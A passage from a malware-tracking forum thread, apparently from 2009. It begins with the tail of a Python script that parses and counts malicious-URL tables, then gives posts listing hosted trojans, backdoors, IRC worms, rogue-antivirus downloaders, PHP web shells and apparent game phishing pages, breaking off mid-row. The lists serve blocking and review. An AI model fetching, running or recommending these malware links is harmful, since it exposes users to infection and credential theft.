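    Rows whose cell count does not match the header (the forum truncates
    long posts mid-line) are skipped rather than mis-assigned. The board's
    HTML rendering leaves '&amp;' inside URLs, so the url cell is unescaped.
    A URL containing a literal '|' would break the split; none occur here.
    """
    rows = [l for l in text.splitlines() if l.lstrip().startswith("|")]
    if not rows:
        return []
    header = _cells(rows[0])
    records = []
    for line in rows[1:]:
        cells = _cells(line)
        if len(cells) != len(header):
            continue
        rec = dict(zip(header, cells))
        rec["url"] = unescape(rec["url"])
        records.append(rec)
    return records


def host_of(url):
    """Hostname component of a URL, lower-cased ('' if unparsable)."""
    return (urlsplit(url).hostname or "").lower()


def hostnames(records):
    """Distinct hostnames, sorted. Shared free hosts (ripway.com,
    fileave.com, geocities.com) also serve benign users, so prefer
    URL-level blocking where the proxy supports it."""
    return sorted({host_of(r["url"]) for r in records})


def by_field(records, field):
    """Counts per value of one column, e.g. 'netname' or 'scanner'."""
    return Counter(r[field] for r in records)


def undetected(records):
    """URLs no scanner flagged ('undef'): candidates for manual review,
    not for dismissal."""
    return [r["url"] for r in records if r["scanner"] == "undef"]


def urls_with_credentials(records):
    """ftp://user:pass@host entries carry the compromised site's own login;
    treat these rows as sensitive when sharing the list."""
    return [r["url"] for r in records if urlsplit(r["url"]).password]


if __name__ == "__main__":
    recs = parse_dump(SAMPLE)
    print(len(recs), "records")
    print(by_field(recs, "netname"))
    print(hostnames(recs))
    print(urls_with_credentials(recs))
```

Feed it a whole post's table (everything between the `Code:` marker and the next `Title:` line) and the cell-count check will silently drop the row the forum cut off, which is what you want for an automated feed; log the skipped line count if you need to know how much was lost.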
Title: Re: daily something......
Post by: cleanmx on July 21, 2009, 12:46:59 pm
and all malware @ripway.com

Code: [Select]
+----------------------+---------+---------------------------+--------------+--------------+---------+--------+-------------+-------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname                 | review       | email        | country | source | netname     | url                                                                                 |
+----------------------+---------+---------------------------+--------------+--------------+---------+--------+-------------+-------------------------------------------------------------------------------------+
| 2009-07-21 13:25:19  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zh4ck3rz/out.exe                                               |
| 2009-07-21 13:25:18  | avira   | TR/Drop.Stabs.aap         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yjm/sex.exe                                                    |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/YouareaLoser/                                                  |
| 2009-07-21 13:25:18  | avira   | BDS/Bifrose.aleo          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yourtube/3.exe                                                 |
| 2009-07-21 13:25:18  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yourtube/up7.exe                                               |
| 2009-07-21 13:25:18  | avira   | BDS/Bifrose.aleo          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yourtube/windows.exe                                           |
| 2009-07-21 13:25:18  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yrr/sysem.exe                                                  |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yusron16/fs.html                                               |
| 2009-07-21 13:25:18  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zabado2010/3.exe                                               |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zahirka/index.php?link=http://&size                            |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zahirka/index.php?link=http://&size=                           |
| 2009-07-21 13:25:18  | avira   | DR/Turkojan.evn           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zenaeshta/lamees.com                                           |
| 2009-07-21 13:25:18  | avira   | TR/AntiAV.SU              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zero0007/alsafah.exe                                           |
| 2009-07-21 13:25:18  | avira   | BDS/Bifrose.aqib          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zero0007/non.exe                                               |
| 2009-07-21 13:25:18  | avira   | TR/Dldr.VB.JTZ            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zero0007/ser.exe                                               |
| 2009-07-21 13:25:17  | avira   | TR/Poison.ymq             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/xdanker/xserver.exe                                            |
| 2009-07-21 13:25:17  | avira   | TR/Spy.335908             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/xtorrentsx/Drew.exe                                            |
| 2009-07-21 13:25:17  | avira   | DR/DNSChanger.nvj         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/y/startimes.exe                                                |
| 2009-07-21 13:25:16  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/welaa/s.exe                                                    |
| 2009-07-21 13:25:16  | avira   | TR/Agent.buag.70          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/windazo/piczo.exe                                              |
| 2009-07-21 13:25:16  | avira   | TR/Midgare.NFV.1          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/rock.exe                                              |
| 2009-07-21 13:25:16  | avira   | TR/Poison.yeg             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/setup-.exe                                            |
| 2009-07-21 13:25:16  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/setup.exe                                             |
| 2009-07-21 13:25:16  | avira   | TR/Midgare.NFV.1          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/setupe.exe                                            |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/wonderboy3453/login.php                                        |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula                                            |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula/                                           |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula/auth/identity_verification.html            |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/WoWotLK                                                        |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/WrathoftheLK                                                   |
Title: Re: daily something......
Post by: sparsha on July 23, 2009, 02:51:47 pm
Sites related to the XP Deluxe Protector rogue
Code: [Select]

http://antispy2009.net/onlinescan/index.php -> fake scanner page
http://antispy2009.net/setup.exe -> Rogue downloader

http://downloadsoftwareserver3.com/gdi32lib.dll
http://downloadsoftwareserver3.com/xpdeluxe.exe

xp-deluxeprotector.com - homepage
Title: Re: daily something......
Post by: sparsha on July 23, 2009, 03:07:50 pm
Code: [Select]

http://scanriteweb.com/hitin.php?land=98&affid=16100
http://scanriteweb.com/download.php?affid=16100

http://securityscanavailable.com/hitin.php?land=20&affid=20100
http://securityscanavailable.com/download.php?affid=20100

http://exereload.com/onlinemovies.1.48040.exe

Title: Re: daily something......
Post by: cleanmx on July 23, 2009, 04:33:12 pm
21/22/23 Jul new malware
| 2009-07-23 14:22:51  | clamav  | PHP.Downloader-4               | 110.45.138.139  | support@kidc.net               | KR      | APNIC  | KIDC                      | http://www.shinsungbuk.com/BOARD/skin/ggambo7002_gallery/vti/spread.txt                          |
| 2009-07-23 14:18:17  | avira   | PHP/BackDoor.AR                | 58.230.118.105  | abuse@hanaro.com               | KR      | APNIC  | HANANET                   | http://shalomchair.com/fx29id2.txt                                                               |
| 2009-07-23 14:07:08  | avira   | PHP/C99Shell.C                 | 65.247.182.200  | abuse-mail@verizonbusiness.com | US      | ARIN   | UUNET65-2                 | http://65.247.182.200/r                                                                          |
| 2009-07-23 14:05:28  | avira   | SPR/PHP.ID                     | 59.4.104.174    | abuse@kornet.net               | KR      | APNIC  | KORNET                    | http://80.mipyeong.or.kr/fr.txt                                                                  |
| 2009-07-23 14:04:38  | avira   | SPR/PHP.ID                     | 77.220.22